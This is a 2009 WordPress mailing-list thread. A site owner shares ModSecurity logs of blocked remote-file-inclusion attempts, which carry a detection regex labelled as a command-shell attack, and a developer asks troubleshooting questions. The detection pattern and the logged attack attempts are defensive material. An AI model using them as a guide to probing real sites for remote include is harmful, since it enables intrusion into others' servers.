[wp-testers] **Maybe OT** Hacking Problem In 2.7.1

Ibrahim A. Mohamed bingorabbit at gmail.com
Tue Apr 14 13:29:00 GMT 2009 

Hello,

Can you please send us the content of .htaccess in the root directory of
your wordpress installation.

Also have you changed any of your files' permissions?

Is there any suspected activity in your website's traffic?

Thanks in Advance!

On Tue, Apr 14, 2009 at 2:29 PM, Paul Robinson <pablorobinson at gmail.com>wrote:

> Hi,
>
> I hope the title is descriptive enough & I think it's a little off topic so
> I've added that.
>
> Basically for the last 2 maybe 3 weeks I've had stability problems with my
> website, I assumed it was down to server problems & asked my host to check
> it out. Apparently there was no problems. Then the site just stopped
> working
> & only showing 500 errors. I download the apache error logs & find this:
>
> [Mon Apr 13 05:37:38 2009] [error] [client 217.199.222.19] ModSecurity:
> Access denied with code 503 (phase 2). Pattern match
>
> "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?"
> at REQUEST_URI. [file
> "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line
> "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt
> to
> remote include command shell"] [severity "CRITICAL"] [hostname "
> return-true.com"] [uri "/hw3.php"] [unique_id "SeMyEkPNBIMAAFN2guwAAAAE"]
> [Mon Apr 13 05:37:38 2009] [error] [client 217.199.222.19] ModSecurity:
> Access denied with code 503 (phase 2). Pattern match
>
> "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?"
> at REQUEST_URI. [file
> "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line
> "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt
> to
> remote include command shell"] [severity "CRITICAL"] [hostname "
> return-true.com"] [uri "/2009/03//hw3.php"] [unique_id
> "SeMyEkPNBIMAAEe1L5IAAAAF"]
> [Mon Apr 13 05:37:38 2009] [error] [client 217.199.222.19] ModSecurity:
> Access denied with code 503 (phase 2). Pattern match
>
> "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?"
> at REQUEST_URI. [file
> "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line
> "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt
> to
> remote include command shell"] [severity "CRITICAL"] [hostname "
> return-true.com"] [uri
>
> "/2009/03/zstore-helper-wordpress-plugin-for-zazzle-store-builder//hw3.php"]
> [unique_id "SeMyEkPNBIMAAFLAg at sAAAAC"]
> [Mon Apr 13 05:51:33 2009] [error] [client 200.93.147.154] ModSecurity:
> Access denied with code 503 (phase 2). Pattern match
>
> "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?"
> at REQUEST_URI. [file
> "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line
> "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt
> to
> remote include command shell"] [severity "CRITICAL"] [hostname "
> return-true.com"] [uri "/includes/header.php"] [unique_id
> "SeM1VUPNBIMAAGVMYQAAAAAJ"]
> [Mon Apr 13 05:51:33 2009] [error] [client 200.93.147.154] ModSecurity:
> Access denied with code 503 (phase 2). Pattern match
>
> "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?"
> at REQUEST_URI. [file
> "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line
> "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt
> to
> remote include command shell"] [severity "CRITICAL"] [hostname "
> return-true.com"] [uri "/2009/04/php-tip-5-header//includes/header.php"]
> [unique_id "SeM1VUPNBIMAAHm84wEAAAAF"]
>
> then after that all processes created by my site a cut by the shared
> servers
> memory limiting script. The last two times this happened it took a
> reinstall
> of WordPress' files to fix it, but this last time I had to restore a back
> up
> of the database, which are taken regularly thank god. I have been told by
> my
> host that the attacks are always blocked but they seem to break WordPress
> somehow & that's what I'm hoping someone can help with. I realize it's a
> long shot, but I've got nothing to lose seeing as it's happening fairly
> often.
>
> I have beefed up security on WP a lot, I've changed the default db prefix,
> I've chmod'ed all folders to the recommended settings & i've placed
> .htaccess files in my admin & includes folders. Any other suggestions of
> what is happening or how to stop it would be great. Thanks
>
> Paul.
> _______________________________________________
> wp-testers mailing list
> wp-testers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-testers
>



-- 
Regards,
Ibrahim Abdel Fattah Mohamed
Web Developer
Twitter: @bingorabbit
e-mail: bingorabbit at gmail.com
Personal bLOG: http://bingorabbit.com/

More information about the wp-testers mailing list